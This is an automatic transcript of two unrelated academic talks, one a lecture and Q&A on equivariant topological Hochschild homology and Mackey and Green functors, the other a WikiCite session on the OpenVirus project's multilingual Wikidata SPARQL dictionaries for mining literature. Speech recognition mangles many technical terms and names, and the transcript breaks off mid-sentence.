an isomorphism. So I'd like some analogous story with my twisted THH. I'd like to understand how it relates to some algebraic analog. But if we look at this classical story, you know, I took Hock-Schild homology of a ring and it was related to THH of the Eilenberg-McLean spectrum. And so that brings me to a question which is, well, now I need my input for my twisted theory needs to be equivariant. And so the question is, how do I get a C and ring spectrum as an Eilenberg-McLean spectrum? I'm going to need to do that in order to make sense of this analog. Or a different way maybe of phrasing that question is, what is the equivariant analog of a ring? Okay, so I need to get at those questions if I'm going to be able to understand this kind of equivariant analog. Okay, so we're going to take a little detour to talk about some basic objects and equivariant homotopy theory that we haven't actually heard much about yet this week. And they're called Machyfunctors. So this is going to seem like a detour for a second and it's going to bring us back to this question of what is the equivariant analog of a ring. Now, if you've never seen a Machyfunctor before, the thing that you should have in your head about Machyfunctors is that Machyfunctors are like the abelian groups of equivariant stable homotopy theory. So what do I mean by that? Well, in ordinary homotopy theory, we have a lot of invariants that give us abelian groups. In equivariant homotopy theory, we have a lot of invariants that give us Machyfunctors. So what is a Machyfunctor? Well, I'm going to let my group be finite. So for G finite, a Machyfunctor, M, is actually a pair of functors. So I'm going to call one of them M lower star and one of them M upper star, and they're functors from finite G sets to abelian groups. One of them is covariant and one of them is contra variant. Okay, so I have these two functors. And the, the, they have to satisfy a few properties. So one is that I, the functors have to agree on objects. So M lower star of X has to agree with M upper star of X and that shared value is called M underbar of X. So when you see these underbars, that's indicating that we're working with Machyfunctors. Tina, I need, yes. I'm sorry to have interrupted you. There is a question. What goes wrong if you try to copy the definition of C and twisted THH for G equivariance Z module spacer. I think that the question is that in the ordinary case of topological Hock-Schild homology, you can define topological Hock-Schild homology like a relative version of Hock-Schild, topological Hock-Schild homology for module spectra. And if you do relative T that I'm using the, okay, if you do relative THH for HZ modules in the classical case you get back the algebraic theory of Hock-Schild homology. And the question here is, why can't I do this twisted version for HZ module spectra and would that give me back what I want. You know, I have to admit that I have not thought about the relative, like the A relative version of the twisted theory. So I don't. I don't have a good answer off the top of my head of what kinds of considerations you would need to take there. I just haven't thought through. Thought through how that that we haven't defined that object and I haven't thought through how that definition would work. And another question from Sean Tilson. Oh yeah so Sean says you get some chukla stuff because of the tensor product being derived. So, well I haven't gotten there yet but I'm going to talk about this equilibrium theory of Hock-Schild homology and that can be generalized to this, this version of chukla homology as well. It's not defined in the way that was just mentioned as like thinking of this as a very twisted things over HZ module spectra. And I have not thought about whether that's equivalent. Okay so right I was saying what a Machi functor is so a Machi functor is a pair of functors they have to agree on values. They need to take disjoint union to direct some and they have to satisfy some axioms that I'm not going to write today. So, if you haven't seen Machi functors before one nice sort of diagrammatic thing to keep in mind about Machi functors is the following. In particular, if you have some nested subgroups of your group G, so I have K sitting inside H sitting inside G, we have a projection map right from G mod K to G mod H. So what happens with the Machi functor? Well the Machi functor these G mod K and G mod H those are finite G sets. So I get a value for the Machi functor at G mod H. I get a value for the Machi functor at G mod K. And I have a covariant functor and a contravariant functor relating them so I get maps in both directions. The covariant functor we usually call the transfer from K to H and the contravariant functor is often referred to as the restriction from K to H. And it turns out any finite G set is a direct sum of these orbits, these things of the form G mod K. And so characterizing what happens on these orbits really tells you what happens with the whole Machi functor. Now, we've actually seen a Machi functor already even though we didn't put it in that terminology we've been working with a Machi functor sort of all week, which is the following. If you have X, a G spectrum, you get a G Machi functor, which is the homotopy Machi functor of X. So I want to specify for you what is this homotopy Machi functor do on an orbit G mod H. And this is supposed to give me some abelian group and what does it give me well it gives me the end homotopy group of the H fixed points of my spectrum X. So, on Tuesday all that time we were studying fixed points of THH in particular we were studying a Machi functor. And when I say Machi functors are like the abelian groups of a covariant homotopy theory this is kind of what I have in mind. In ordinary homotopy theory my homotopy groups are going to spit out a billion groups, and an equivalent homotopy theory, the homotopy, the natural way to think about homotopy of an equivalent spectrum is as a Machi functor. So Machi functor constructions are very closely tied to equivalent spectra. So let me note that if you have a G Machi functor. Let's call it M. It has an Eilenberg Maclean spectrum attached to it which is a G spectrum. And we write that as H M. And in what sense is it Eilenberg Maclean well it's a G spectrum so I can take its homotopy Machi functor. And what do I get out in degrees zero, I get my Machi functor back. And in all other degrees I get zero. So that's the sense in which this is Eilenberg Maclean. Okay so that's nice to a Machi functor I can associate an Eilenberg Maclean Equivariant spectrum. So we're going to need a notion of norms for these Machi functors. So, Hill and Mike Hill and Mike Hopkins, give a definition of what it means to take a norm of a Machi functor. And they say the following, if H is a subgroup of my finite group G, and M is an H Machi functor. So I'm going to define what it means to take the norm from H to G of the Machi functor M. And here's their definition. Their definition is, okay so I have my Machi functor, and I just said I could take an Eilenberg Maclean spectrum associated to it now that's an H spectrum. So I have a norm in Equivariant spectra that Hill Hopkins Rabinel norm. So I can take the norm from H to G in spectra. Now I have a G spectrum, but I wanted a G Machi functor. And so to get back to Machi functors I can take Machi functor Pi zero of that. So plus minus on this definition of Machi functor norms is the following. On the upside, it's nice to define it really highlights the close relationship between Machi functors and the Equivariant theory of G spectra. And if you want to prove theorems about the Machi functor norm, this is often the definition that you use. The minus of this definition is if you want to actually compute the norm of a specific Machi functor, this is very difficult to get a handle on a computation this way. So there are much more algebraic constructions of the norm in Machi functors that are due, for instance, to Kristen Mazzur and Rolf Hoyer. And they have more hands on approach of understanding this without going through the Equivariant stable homotopy theory. Okay, but the Hill Hopkins definition is clean and can be useful for us. Another thing we need to note about this is that there's a symmetric monoidal product on this category of G Machi functors which is given by what's called box product. So what is the box product of two G Machi functors. Well, this box product one way of saying what it is is it's closely related to the product in symmetric in Equivariant spectra. So if you take my island berg McLean spectrum of M, my island berg McLean spectrum of n, smash them together to get a G spectrum and then take Machi functor Pi zero to get a G Machi functor. There is a question. Other contra variant maps on PIM some sort of averaging over H mod the mod K. So I've been maybe a little sloppy is the wrong word neglectful up here. So when I talked about this homotopy Machi functor I just told you what it does on each on these orbits. A homotopy Machi functor is more than just of course the information of what happens to the finite G sets it's also these contra variant functors these transfer and restriction maps. In the context of the homotopy Machi functor how do we think about that. So one of them, the restriction map is a nice easy to describe map that's a map given by inclusion of fixed points so it's actually confusingly the map that we called f earlier in the week not the map we called our. There's a clash of notation there but but that map is inclusion of fixed points the other map is in this context sometimes called the well maybe not in this exact context but it's what's called the Aquavariant transfer map. And the way to think about that map maybe is that it comes from. What's called the birth Mueller isomorphism and Aquavariant homotopy theory tells you that you have these kinds of maps as well but it's sort of a unique thing to being in the Aquavariant setting. So you use the birth Mueller isomorphism and also some duality of these orbits to talk about that transfer map. Um, yeah, good question. Okay, so this box product I've given you a definition of the box product and then this is similar to what I was saying about the norms which is that this is a definition that goes through Aquavariant stable homotopy theory. Machi functors are really algebraic objects you're supposed to think of them as living in algebra and lots of people in math use Machi functors that are not interested in stable homotopy theory. Machi functors are useful for studying representation rings and other things. Um, so you can define the box product totally algebraically. But I'm giving you this characterization to show the relationship with the G spectra. Okay, so now I have this symmetric model product on G Machi functors and finally I'm ready to address the question of what is an Aquavariant ring. Well an Aquavariant Abelian group is a Machi functor and Aquavariant ring is called a green functor. So a green functor is a monoid in this category. And then the note is that if I have a green functor for a green functor are its Eilenberg McLean spectrum is a, well, for a green functor are for CN, it's Eilenberg McLean spectrum is a CN ring spectrum. So one of our questions was well how do we get an Aquavariant ring spectrum as an Eilenberg McLean spectrum and the answer is using green functors. So what do I really want for that Aquavariant Analog well it turns out that what I need is a theory of Hawkshield homology for green functors. Okay, and that theory of Hawkshield homology for green functors is defined using that same kind of construction of a twisted cyclic bar construction. So we can do the same construction that we did for spectrum now we can do it in the context of these green functors so where we had a ring spectrum before replace it with my green functor where I had smashed products I replace it with box products, but you do that same twisted construction and it makes sense here. And so what is the definition then of Hawkshield homology for green functors. Well this comes out of work of Andrew Blumberg, myself, Mike Hill and Tyler Lawson. So the definition is the following. If you have h inside g inside s one in our an h green functor. We look at the G twisted Hawkshield homology of our. And we prove that it's the homology of a twisted cyclic bar construction on the norm from h to G of R the Mackie functor norm for our. Okay, so, oh yeah so is the box products symmetric yeah this is the symmetric monoidal structure in this category. So the symmetric monoidal structures. In order to talk about that you really want to be working more with 10 borrow functions and not just with Mackie functors and I'm kind of, I don't want to go there right now. But yes it is a symmetric monoidal structure and if you're working with some borrow structures, the tomorrow functors you get even more than that. So, I claim that this is the equivariant, or sorry the algebraic analog of my twisted THH and the theorem is that well we have a linearization map. Relating these theories so if I look at the H twisted THH of my Eilenberg McLean spectrum. So if I take its homotopy Mackie functor that maps to this twisted version of topological Haxial Tomology for green functors. And this is further in isomorphism if K is equal to zero, which is what we wanted to see from the, which is what we wanted to see from the perspective of what happens in the classical case. So one of our goal was to define an equivariant version of the boxed at spectral sequence so another like point of proof that this is the right algebraic analog would be if you had a boxed at spectral sequence, computing twisted THH with E2 term in this Haxial Tomology for green functors. And indeed there is such a spectral sequence. So in work of Catherine Adamic. Myself, Catherine has in bar client and Hannah Gekong. So that we construct such an equivariant spectral boxed spectral sequence. So we construct an equivariant boxed spectral sequence for twisted THH. And it has E2 term in the Haxial Tomology for green functors. And it turns out that this Haxial Tomology for green functors really is, you know, the right algebraic analog that you're looking for. And it turns out that this spectral sequence can be used computationally. So part part of this work of these authors I just mentioned, is that we use this equivariant boxed at spectral sequence to compute the equivariant homology of the C2 twisted THH of MUR. And we use this equation that we learned earlier with coefficients in what's called the constant Mach-e-Funkter F2. So this is an equivariant version of homology. If you're not familiar with that, I'm not going to dive into what exactly that means, but that's the natural notion of homology to consider in this equivariant setting. Okay, I'm almost out of time, but I want to, I want to close by addressing one question. I want to sort of bring this full circle. In the beginning of the week, we were talking about k theory of rings, and now I've been talking about these equivariant analogs of THH. And so a question you might have is, well, can these equivariant theories tell us anything about the classical story? So can we learn about the classical story this way? And so I want to connect it back. So what does this tell us about the classical story? Here's one thing to say about it. Well, why would there be any connection? So here's one reason we might expect to have a connection to the classical story. The classical story was about rings. And now I've moved into this world of green functors and Mach-e functors, but a ring is actually a green functor. A classical ring is a green functor for the trivial group. Okay, so what does that mean? Well, it means that we get some new trace maps out of this story. So I had a trace map from algebraic k theory to topological Hock-Shield homology, we lifted through the fixed points. And if you use this new linearization map relating the equivariant THH to this twisted version of Hock-Shield homology, what you find is that you get a trace map from the algebraic k theory of a classical ring to the Cp to the n twisted Hock-Shield homology of that ring, evaluated at the orbit Cp to the n mod Cp to the n. So I'm not going to unpack how you get that trace map exactly, but it follows directly from that linearization map that we had a moment ago. So what is this thing? Well, the way to think about this is that this is the algebraic analog of fixed points of THH. So this is a purely algebraic object that is going to serve as an analog of fixed points of THH. Now, in order for those fixed points of THH to be useful in order to study TC, I needed to not only know about the fixed points themselves, but I needed to know about those two operators on them, that f and that r. The f map is already part of the Mach-E-Funkter. It's like built into this story automatically because it is the restriction map in those Mach-E-Funkters. So I don't have to worry about that, but the r map is something outside the Mach-E-Funkter structure. The r map, which was confusingly called the restriction in this context, that was the map that depended on the cyclotomic structure. And once you have that r map in the classical theory, there is an object called topological restriction homology, which is what you get when you take the limit across the r maps of THH. You can frame it this way on Monday, but this TR, this topological restriction homology is like between the fixed points of THH and topological cyclic homology. It's one of the things you compute on the way. So what I'd like to know is, well, can I do this in the algebraic setting? Do I have an analog of that restriction map, the map that came from the cyclotomic structure? And so what we show in Blumberg, myself, Hill, and Lawson is that you do get such an analog of this restriction map. So we define geometric fixed points for Mach-E-Funkters. And we show that you get a type of cyclotomic structure on the Hock-Shield homology of Green-Funkters. And in particular, Can you get this tracing out via the universal property of algebraic k-theory as in Blumberg, Gevner, Tabawata? I'd have to think about whether there's a way to characterize it in terms of the, probably, I'd have to think about whether there's a way to characterize it in terms of the universal properties. That's not how we define it. We define it directly through the trace from k-theory, through the topological denistrace, basically, and the fact that the topological denistrace lifts through fixed points. But I have not thought about whether there is a universal characterization of it. So I'm not sure. Right. So the last thing I was saying is that we define what it means to take geometric fixed points for Mach-E-Funkters. We prove that there's a type of cyclotomic structure on Hock-Shield homology for Green-Funkters. And what it gives you is it gives you an algebraic version of TR, which we call little TR. And what is this? Well, it's some limit over these algebraic versions of the restriction map of these C-P to the N-twisted Hock-Shield homology for the ring A, evaluated at this orbit. And as an example, you could compute, for instance, the algebraic TR of Fp. So we do this calculation and what goes into that? Well, you need to understand the Mach-E-Funkter norms on Fp, the twisted cyclic bar construction on Fp, and then the cyclotomic structure for that. And it turns out what you see is that you get the p-addicts in degrees zero and zero everywhere else. And so in this case, this algebraic approximation is really a good approximation because that agrees exactly with the topological restriction homology, the topological theory, and the p-completion of algebraic k-theory of Fp. Okay, so in this case of Fp, it captures, you know, all the information basically, that of course in general will not be true. Some algebraic analog of this topological theory. Okay, I'm a little bit over time, so I'm going to stop there and it has been a pleasure to be with you this week and I hope that I have given, especially the early queer people, some idea about what trace methods and k-theory is about and some sort of interesting developments that have been happening in this area. So I will stop there. Many thanks indeed. And let's thank this Tina for a wonderful mini course. There is a question. Can you say roughly what the bread and homology of THH, M-U-R is? And does it split into pieces where some of these summands are familiar? Yeah, I should know how to split it into pieces. So I can tell you what the, you know, if I look it up, I can tell you what the answer is. I still remember when I was a PhD student many years ago now, the first time that I asked my advisor something that was in a paper that he wrote, and he said, oh, I don't know, I'll look it up. And that was like for me a very liberating moment that even my advisor like didn't remember everything he'd ever written down. So I don't feel bad about looking up this answer in my own paper. Right, so what is the answer for the C2-equivariate homology of the topological hawkshield homology of M-U-R? So this is the C2-twisted hawkshield homology. So in this case, we get a really nice answer. So I haven't, okay, there were a few things I didn't say. So one of the things I didn't say is that that equivariate box-ded spectral sequence, when you start working in these equivariate worlds, you end up having multiple gradings. You get a Z graded spectral sequence. So a spectral, you get Z graded theories where they're graded by the integers like we're used to. And you also get theories graded by representation rings. And so it turns out that the representation ring object is the more natural thing to consider in many cases. So what I'm writing down is the ROC2 graded equivariate homology. And for those of you who are not, who are new to equivariate stable homotopy theory, let me introduce you to a really special convention, which is that a five-pointed star is usually an equivariate grading. That means a representation, and an asterisk is an integer grading. So something useful to know. So that grading is now graded by representations. And what this is, is it's the Eilenberg-McLean, the equivariate homotopy groups of the Eilenberg-McLean spectrum of F2 with polynomial generators on that. And then it's box over HF2 star of the exterior thing over HF2 star of Z1, Z2, etc. So I don't know if that was helpful or not. The degree of BI is I times the representation, the regular representation, and the degree of Zi is one plus that. So that's what the answer is for the equivariate homology of that. And I don't know if you find that helpful or not. But yeah. Okay, so one way of seeing, so the question is, one way of seeing topological Hock-Schild homology is as a relative smash product over a tensor A op, and is there an analog of this for this CN twisted THH? Yes, you can think of the CN twisted THH in terms of these relative smash products. And maybe the thing to say is that, so if I'm interested in, let's say the H twisted THH of R, and I'm interested in that as like a G spectrum. So if I'm, I think I did that in the opposite direction I meant to. If I want to look at the G spectrum, restrict that to a G spectrum, then you can write this as a G spectrum from H to G of R smash over that thing op. So the, no, sorry, that the enveloping thing, the that smash that op. But then what you have over here is you have a twisted version in of the norm. So yes, there is a way to characterize it in terms of these relative smash products but you pick up a little bit of a twist so it's a bit different than the classical one. The next question I see is, is there a trace map from the equivariant k theory to this twisted THH? Yeah, that's a great question. So that's in a very natural question to ask is like, well, I've talked about, you know, I, at the end I was saying, well, you can get trace maps out of a ring but can we naturally get trace maps from some kind of equivariant version of k theory to this twisted THH. The answer to that is yes. I have work in progress with some of the people I mentioned, Catherine Adamic, Catherine Haas, and I'm going to ask, in Mark Lang and Hannah Gekong, where we're looking at like, what is the right kind of k theory in order to get that sort of trace map and maybe I won't say too much about that since this work in progress. I don't want to make any bold claims yet. I don't have like known notions of equivariant k theory. So a lot of people have considered different notions of equivariant algebraic k theory, and I don't yet have like a connection between the CN relative THH and those different known theories of equivariant k theory. Is there a reason we don't have to use a drive limit for TR? I mean, so this limit that I'm talking about here, these things that I am taking the limit of now are all just a billion groups and so here it is just like an ordinary group of billion groups that ends up being the right thing to take their, I don't know, maybe that's not a very satisfying answer, but that's what's happening in this case. Let me read your question. If G is a finite group acting on a commutative ring R, can we cook up a G timbara functor? Perhaps with the fixed point. G is a finite group acting on a commutative ring R. I'm not sure exactly what you're asking. So you want like a group acting on a classical ring, can we cook up a G timbara functor? I don't know off the top of my head. Yeah, I'm not sure what the answer to your question is. I apologize. What kind of marine invariance property is this twisted THH have? That's another great question. So the, right, so these Hock-Shield theories in general, Hock-Shield homology, topological Hock-Shield homology, any sort of Hock-Shield theory, one thing that you might want to ask for is that it's marine invariance, right? That's something that's really common amongst Hock-Shield theories and something that's sort of important to those theories. So in some cases you can prove that directly, but there's a recent work of coming out of work of Cape Ponto and Ponto Shulman, and now there's a larger group of collaborators, Ponto, Campbell and Ponto, etc. So we talked about Hock-Shield homology and topological Hock-Shield homology as bi-categorical shadows. And that shadow approach, whatever that means, I don't want to go into what that means, but it's, we heard a little bit about it in the first lecture this morning, if you were there, that kind of idea of a shadow. If you know that THH is a shadow, then marine invariance comes for free, because it turns out marine invariance is like a natural notion of equivalence on bi-categories. So the question is about twisted THH, and this is a great question. In that same work in progress that I mentioned of Adamic and myself and Hauss and Clang and Kong, we have shown that you can view this twisted topological Hock-Shield homology as sort of an equivariant shadow. So in particular, you get marine invariance also in this case for free. And so, yeah, it aligns nicely with what you'd expect from one of these topological Hock-Shield, or Hock-Shield theories and you do get marine invariance. So that's a nice property to know that you have of twisted THH. Any other questions or comments to Tina? If not, then, merci beaucoup for everything for a wonderful mini-course. Thanks. Thank you Tina again.
|
Algebraic K-theory is an invariant of rings and ring spectra which illustrates a fascinating interplay between algebra and topology. Defined using topological tools, this invariant has important applications to algebraic geometry, number theory, and geometric topology. One fruitful approach to studying algebraic K-theory is via trace maps, relating algebraic K-theory to (topological) Hochschild homology, and (topological) cyclic homology. In this mini-course I will introduce algebraic K-theory and related Hochschild invariants, and discuss recent advances in this area. Topics will include cyclotomic spectra, computations of the algebraic K-theory of rings, and equivariant analogues of Hochschild invariants.
|
10.5446/51069 (DOI)
|
Hi everyone, good to see you all here. I'm Erica Zelini and along with Celia Costa, I'll be the host for this session. We both are members of the Wikimovimento Brasil User Group. We are located in Sao Paulo, Brazil, and we are honored to have in this session such location and language diversity to show to you. We have here at least three very different time zones, which was a bit challenging to coordinate, but totally worth it. So the initial idea was to gather on a single session, to call people from the global south working on modeling projects on Wikidata and with bibliography and libraries. So very ambitious. Then Thomas Schafer recommended us to talk to Peter Murray-Rust, and his team from OpenVirus based in India, and we are glad we did it. So soon we realized that that would be better to split into sessions. So now you'll get to know the diverse team from OpenVirus plus some interfaces with Latin America and Indonesia. And later today Celia and I will be back with another session on Structuring Wikidata Projects. So this one will be held 75% of the time in Portuguese and 25% of the time in Spanish. I think it will work out well. So please, even if those aren't your first languages, you're welcome to join us and get to know these projects. I don't want to make this introduction too long, but say thank you is never enough. So I just want to say thank you to the speakers in advance. I'm sure we'll learn a lot from them. And I also want to thank to the Wikiside committee that approved under the eSchoolership modality that Celia and I ran those two sessions. And a special thanks to Leon Wyatt that have been supporting us since the beginning. So the idea was to bring Global Solvices to the conference under these teams. And I believe that Wikiside is all about language diversity as well after all. So now some reminders. You can ask questions or make comments directly through YouTube or the other pet that is available on the program. You can also comment via Twitter. Celia will be dealing with this. And we'll let the speakers do their talk and open for questions and for discussions at the end. So without further ado, I'll bring the speakers to start this session. So please welcome Peter Murray-Rust, Chewita Hedge, Frutri Virajan, Viraj Dengani, Lakshmi Devitriya, Vaishali Arora, Dr. Andrin Hamadani, Ayush Ghar, Ariana Berisel-Garcia, Frutri Virajan, Dezapta, even anyone. And please correct me if I mispronounce any other beautiful names and let's have fun with it, OK? So please, I'll bring the first one that is Peter. And I'll share your screen. Excellent. So this is a wonderful meeting and greetings to everybody. This is not my show. This is me helping a number of people I know to present their message to the world. I'm at the University of Cambridge, but I also run a nonprofit called ContentMine. And here you can see that six years ago, we visited Brazil for open science meeting. Maybe you can recognize some of the people. And I want to say that Brazil and other Latin American countries are doing a wonderful job in fighting for open. And you will see later what Ariana has to show from Mexico. But this is your show. And I hope that we can support you in this endeavor. I was very involved in developing content mining. And six years ago, my colleague Jenny Maloy visited Gita Yadav in Delhi. And this was a meeting that we held over the internet six years ago. Gita and Jenny are plant sciences. And so this concentrated on the chemistry of plants. And Gita and I have been running a project for six years on that. Now, why does it matter? About seven years ago, there was a major epidemic of Ebola virus in Liberia. And this was predicted, sorry, I go back. This was predicted in the scientific literature. But it was hidden behind a paywall. This message was very clear that here's the paper. It still costs $31. It's 40 years old. But it says very clearly that Ebola and Liberia are linked. And so simple text mining of the sort that we have developed in content mine is capable of liberating this. So the simple message here is we are searching papers in the scholarly literature for the things we are interested in, diseases, viruses, countries, and so on. And we are very grateful to Wikimedia, who supported us with a grant in 2017 to develop content mine version of this we called Wiki Fact Mine. And in this, we developed dictionaries. So the concept is dictionaries of terms that we can search the literature with. And we have been developing it since then. And we are going to show you this today. We took this idea to India a year and a half ago. Here is Geetha again and me in Delhi. And these are some wonderful collaborators in this workshop. And we built dictionaries for rice, millets, and maize, because these are the crops that were particularly concerned for food security. This is a food security program. I've also got the great privilege to know Anasuya Sengupta, who for many years worked with Wikimedia and was the grant making officer. She has now got a Shuckleworth Fellowship. And she has developed a project called Whose Knowledge. And Whose Knowledge is to amplify marginal voices in the world and to decolonize the internet. And that is a theme which this session is going to show to you, marginalized voices and decolonization, and particularly the global south. So what you're going to see in this program is some of our collaborators. You're going to have a presentation from the OpenVirus team. You're going to see Ariana showing the Redilich server in Mexico. And we've invited the SAP to talk about Indonesia archive, so another language from the global south. And we also asked Daniel Metschen to tie this together, using Wikimedia's scholarly. I don't know whether Daniel can join us, but we will finish with a discussion on how we bring all of this together under the Wikimedia umbrella. And so our goal is to unite the Wikimedia technology to honor inclusion, equity, and diversity. And we have an etherpad open. And if you have any questions and ideas, please add them to that. But I will now hand over to Shreya Hedda, who is doing a brilliant job of coordinating this meeting. So over to Shreya. Yes. OK. Thank you so much, Peter, for that. I'm Shreya. I'm an undergraduate from India, as well as science communicator for the team Open Virus. Thank you, Eric and Celia, for organizing such a wonderful session. It's a pleasure to be here at Wikisite. And it's also so nice that we are demonstrating how important Wikimedia's Wiki data has been to our project, as well as for the science as a whole, on its eighth birthday. So the rest of the talk is going to have the following outline. First, I will go over how we built our team. Next, I will also briefly talk about the architecture and the overview of the project. And the team members are now later going to discuss more about the project, the science that we do, and the technicalities of it. And finally, we will have a discussion, which will lead into Wikimedia. So let's get started. There is a huge influx in the number of papers, scientific publications, that are coming out. And more so as COVID-19 hit. Unless the data in it is structured and the papers are annotated and aggregated, there is little the world can do about it. Therefore, there is no simple way for citizens or even researchers to get proper insights from the open literature. So this initial realization led Dr. Peter Mariras and other global volunteers to start with endeavors like this. They started with open climate knowledge earlier this year. But when the pandemic hit, they decided to use the same technology that they used for open climate knowledge to tackle viral epidemics. And that's how open virus started. It started with two interns, along with Dr. Peter Mariras and Dr. Geeta Yadav. Geeta Yadav is a lecturer at the University of Cambridge and also a group leader at NIPGR, as Peter already mentioned. So our team began five months ago. And gradually, as time passed, we were joined by more and more interns, talented individuals who have contributed immensely to the project. And in the middle, we were also joined by Karya interns from Rajasthan, India, which was really great. And recently, we participated in Cambridge Bioinformatics hackathon, wherein we were joined by many other global volunteers to the team. And we always welcome more people to join us, especially Wikimediants. So as you can already tell, our team is very diverse. We've got bioscientists. We've now have computer scientists as well. We've also got a high school student and so on. Most of us have access to laptops, but some of them only have phones. But still, together, we are able to do science. Our team, even though we work virtually, is built upon collaboration, inclusivity, diversity, and equity. One amazing part about our project is that we do all of our work in the open. All of the work that we do is available on our GitHub page, including our progress reports too, which we update in real time. We've also been able to livestream one of our lab meetings online, which is available on this link. And we've also given several outreach talks at various platforms, which is available on this link. And also, this link is available on an ETA file as well. So as the team grew, we divided ourselves into eight mini projects, each of them working on a specific facet of viral epidemics. So we've got eight mini projects, that is viral epidemics in countries, viral epidemics in diseases, drugs and viral epidemics, active funders in viral epidemics research, the role of non-pharmaceutical interventions in viral epidemics, viruses in viral epidemics, the role of zonosis in viral epidemics, and testing and tracing in viral epidemics. Some of our team members are going to discuss some of these mini projects in detail. So how exactly do we extract knowledge from literature? In other words, what is the architecture of our project? Well, we've got three sort of puzzle pieces to the project. First, we've got the mini-copra. Second, we've got the dictionaries. And third, we've got the Amy. Let's actually look at them one by one. First, we've got mini-copra. So mini-copra is like a collection of scientific articles on a specific query. And we get them through many open repositories, like European Sea Repository, which has millions of open access papers. And we use a tool called Get Papers, which helps us download hundreds of papers in minutes. Recently, we were able to collaborate with Arianna from RedLake, and we'll hear more from her later. So because of that collaboration, we now have a mini-copra in Spanish, which we were able to annotate with the help of the tools that we've built. And we would also like to extend this to many pre-print servers in different languages as well. And all of the mini-copra is downloaded on our local machines, and searches are run on our local machines. OK, now the mini-copra is down. Next, we've got dictionaries. And this is where VikiData comes in. We create our dictionaries with the help of Sparkle Query, and we then run it through AmyDick, a tool that we've developed. And more about this later, we have our team members discussing this in detail to get a functional dictionary. So this is how a typical dictionary would look like. This is a dictionary of country facets. So we've got terms that is name of countries. We've got VikiData ID, Wikipedia URL, and so on. We've got eight dictionaries corresponding to eight of our mini-projects. And dictionaries are there to extract multidisciplinary knowledge about viral epidemics. Most of these dictionaries were created directly from VikiData's Sparkle Queries. One amazing thing about these dictionaries is that they're multilingual. And that means that multilinguality means that we can empower the global south as well as other underrepresented parts of the world. The one good thing about using VikiData is that it is very, very easy to introduce multilinguality to the system. OK, so now we've got mini-copra, and then we've got the dictionaries. What do we do with it? Well, that's where Amy comes in. With varieties of dictionaries, we can then annotate and classify the papers in the mini-copra with the help of Amy to get dashboards and concurrences as results. In other words, Amy takes in the mini-copra and it annotates it with the terms that we have given in the dictionary to give us dashboards which link back to VikiData and Wikipedia. And it also gives us concurrences, frequencies, and much more. Amy's search can also give us the main subject in a specific paper with the help of dictionaries. So this is sort of a brief overview of the project. And we can use further downstream tools like Jupyter Notebook R to make further inferences from the results that we get from Amy's search. And this is what is done by the team, especially in the last few months. So let's quickly talk about our inspiration. Well, our inspiration comes from Ranganathan, who is a father of global library science. We believe that repositories are for everyone everywhere, and that knowledge should be free and accessible to all irrespective of what they do or where they come from. One thing that I realized after joining OpenVirus is that the world is more connected than never before. And we can break barriers of languages and countries to come together and do science for the greater good. But that, I would quickly like to thank the team, Dr. Pita Mariraj and Dr. Geetanjali Adho, who has been amazing mentors. And it's always such a delight to work with this amazing team. With that, I would like to hand it over to the team to discuss more of the science that we do. And they will have demonstrations, which I hope is going to be fun. Over to the team. Thank you. Thank you, Shweta. So now we'll have here Rajan and Dheeraj. Hello, can you hear me? Yes. Please hear and bring the screens. Just a second here. Ambrin, can you show his slides? Thank you. Hello, my name is Dheeraj Dingani. I'm from India, Rajan, India. I was with this team in July. It's very difficult to access the internet with us. I don't know when it's coming or not. It's a great thing to be with this team. Next slide. I didn't have a computer. I did all my work on my smartphone, Sparkle and any other. I learned a lot from this open virus, how to work like a team. How much knowledge is out there about computers? Scientific knowledge, which we need to increase. Next. I was introduced by an ocean, which means I have more knowledge and I have nothing. I learned about this internship, how to use the Sparkle and all that. I have used this first query and the results are in the next slide. These are the results. All these are the ID, Wikipedia, links, description, all these are the first multilingual Sparkle query. These are the results. There are two languages, English and Spanish. That's all. Thanks. Thank you, Dheeraj. We now have Rajan, who is going to demonstrate how we use the Sparkle query to create dictionaries. What do you, Rajan? Thank you. I'm Pratap Rajan. I'm going to tell how we build multilingual dictionary by using an example of item drag dictionary. As Svetá said, this is going to be multilingual. We use Wikidata Sparkle query for building a dictionary. It's multilingual. We do have languages such as Portuguese and Indian languages such as Tamil, Sanskrit, Hindi, and some other languages like German and Spanish Portuguese too. This is how we use Wikidata Sparkle query to build dictionaries. Every Wikipedia item has a unique item number. That is like every item has its unique code. That is representative with the term Q. Here's an example that I have shown you of two drugs. In spite of building, bringing all the drugs into one source of one command line, we found that this medication is a tag which has been linked with Instantop under the property. By using this property, we could fix the data from the Wikipedia through Wikidata query service. This is a typically multilingual query looks like. This is going to be where the property, as I said earlier, the Q, which is Instant, that shows the query of that tag that I've been linked with drug, which is related to medications, which have been used for the human as medicines. This VP274, this property tells us the chemical formula because every drug has its own chemical formula and its own pictures. The other property that's P117, which tells us these structures. These are the typical labels, which labels have been determined for the particular language to extract them to. We are telling that we need a label and their alternative label and the description of the particular language that can be as it's mentioned, it's in here in the. This goes multilingual, always we have to give and we have to provide a link or we have to give a reference where the word comes from. Every drug and every molecule in this have been linked directly towards the Wikipedia query. Each language has its own Wikipedia link, so it directly redirects to its own base as well. I'll be demonstrating how it works a bit later. This will be an sparkle output of a multilingual dictionary. You could find here that it has been being multilingual. You could find Wikipedia links of terms in English. You could also find these drugs as its many names, like it has its own IUPAC names and some other local names into it. We have been using alternative labels to fix all the related terms to that drugs. You could also find multiple languages and there are Wikipedia links here for that which could go directly to their pages. Once we get an output, which we give a sparkle endpoint and we directly download that into a local PC. Once we download this into our local machine, we directly give that we run a M-dick which is a software which we build and that directly converts into an ME format. ME format is nothing but that it builds a dictionary with the help of sparkle query and which is directly help us to do ME search and go on with the further results. Now I'll be showing you how the things work out here. As I said, it's Wikidata Sparkle Query. We are giving a select label that each Wikipedia, which Wikidata are nothing but a specific item that can be anything of your sorts. But here we are using drugs. Each drug has its own alternative name, Wikipedia link and a description in it and forward description. As this goes multilingual, we have added several languages. Those are nine languages which I stated earlier. These things we used to be running. As I said, we have been added the property name and medication of property and the chemical formula and the chemical structure of the compound. We have been added the Wikipedia links to get the fixed results from directly. It has nine languages. This code runs nearly 45 lines. Meanwhile, if it takes a sparkle query which takes nearly a half a minute or one minute to get its results. You can also limit your searches, depends upon your time. You could also find there are 1,570 research which I think can catch within nearly a minute. You can limit your service as you need just 10 drugs or 10 results or 12 results. You could add up here that is limit and your term over here which limited your searches. As results are getting down, let me tell you between explain the distings. This will be something you could get your research and once you get this, you could find your link once you click that link, there will be option called the sparkle endpoint. Once you end this sparkle endpoint, you will be getting in your local PZ. Make sure that you add proper terms into 